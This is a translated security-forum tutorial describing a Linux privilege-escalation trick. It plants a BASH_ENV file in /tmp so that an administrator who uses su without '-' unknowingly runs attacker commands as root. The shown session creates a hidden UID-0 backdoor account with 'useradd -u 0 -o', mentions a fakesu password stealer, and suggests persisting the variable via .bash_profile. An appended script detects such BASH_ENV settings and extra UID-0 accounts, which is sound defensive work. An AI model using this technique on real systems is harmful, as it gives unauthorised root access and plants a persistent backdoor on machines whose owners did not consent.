A Linux privilege escalation technique (security tutorial)

Author: Xi4oyu
First, a test:

[xiaoyu@localdomain ~]$ echo $BASH_ENV

[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"
[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc

[xiaoyu@localdomain ~]$ cat /tmp/.bashrc
#!/bin/bash
echo "Hello"

[xiaoyu@localdomain ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 2008-09-11 05:54 test.sh

[xiaoyu@localdomain ~]$ cat test.sh
#!/bin/bash
echo "KK"

[xiaoyu@localdomain ~]$ ./test.sh
Hello
KK

Well, that's good, as we expected. Let's see how we use it.

grep su ~/.bash_history

This shows that the user habitually uses su to log in to the root account. In this situation we used to use a fakesu.c, then modify .bash_profile, create an alias and so on. It uses getpass to get the root password, records it, and then removes the alias ... The catch is that the administrator is shown a password error even when logging in with the correct password. A careless administrator may overlook this detail and simply enter the password again. But a sharper administrator will at once check the system for signs of intrusion, and such an administrator is almost certain to change the root password. So stealing the password is useless. Well, the clever reader will already know what I'm going to do. First, let's see whether the environment variable is still there after su:

[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain ~]$ su
Password:
[root@localdomain xiaoyu]# echo $BASH_ENV
/tmp/.bashrc
Ah, it is still there. OK, that is the end of the experiment. Now in practice:

[xiaoyu@localdomain tmp]$ echo '/usr/sbin/useradd -u 0 -o kk 2>/dev/null' > /tmp/.bashrc
[xiaoyu@localdomain tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2>/dev/null
[xiaoyu@localdomain tmp]$ grep kk /etc/passwd
[xiaoyu@localdomain tmp]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain tmp]$ su
Password:
[root@localdomain tmp]# cd /home/xiaoyu
[root@localdomain xiaoyu]# ./test.sh
KK
[root@localdomain xiaoyu]# grep kk /etc/passwd
kk:x:0:503::/home/kk:/bin/bash
[root@localdomain xiaoyu]#

Oh, I did not add the statement that changes the password. I think, oh, I do not know, I do not know.

As for where to place it: as with fakesu, export the BASH_ENV variable in .bash_profile and other such places ...

If you want to avoid this situation, use su - to log in as root, though I suspect few administrators remember this command. Sweat...
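
A defender's check for the setup described above, as an added example that is not part of the original post: it lists BASH_ENV assignments in shell startup files and reports non-root accounts whose UID is 0. The function names and the list of startup files are assumptions.

```shell
#!/bin/sh
# Added defensive example (not from the original post). Startup-file list and
# function names are assumptions; adjust them to the hosts being audited.

# Print "file:line:value" for each non-comment line that assigns BASH_ENV.
find_bash_env_assignments() {
    for _f in "$@"; do
        [ -r "$_f" ] || continue
        awk -v file="$_f" '
            /^[ \t]*#/ { next }                        # skip comment lines
            {
                line = " " $0                          # so a match at column 1 has a left neighbour
                if (match(line, /[^A-Za-z0-9_]BASH_ENV=[^;&| \t]*/)) {
                    val = substr(line, RSTART, RLENGTH)
                    sub(/^.*BASH_ENV=/, "", val)       # keep only the assigned value
                    gsub(/[\042\047]/, "", val)        # strip quote characters
                    print file ":" FNR ":" val
                }
            }' "$_f"
    done
}

# Print every account other than root whose UID field is 0.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Audit the usual bash startup files, the caller's environment and /etc/passwd.
audit() {
    echo "== BASH_ENV assignments in startup files =="
    find_bash_env_assignments /etc/profile /etc/bashrc /etc/bash.bashrc \
        /etc/profile.d/*.sh /root/.bash_profile /root/.bashrc /root/.profile \
        /home/*/.bash_profile /home/*/.bash_login /home/*/.bashrc /home/*/.profile
    echo "== BASH_ENV in this session: ${BASH_ENV:-<unset>} =="
    echo "== non-root accounts with UID 0 =="
    extra_uid0_accounts /etc/passwd
}

audit
```

Any file reported by the first check should be inspected before the next root session, since a non-interactive bash started from that session will source it.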

I will slowly release more small tricks later; many things have been sitting in the nest so long that I have forgotten them myself ... 囧!
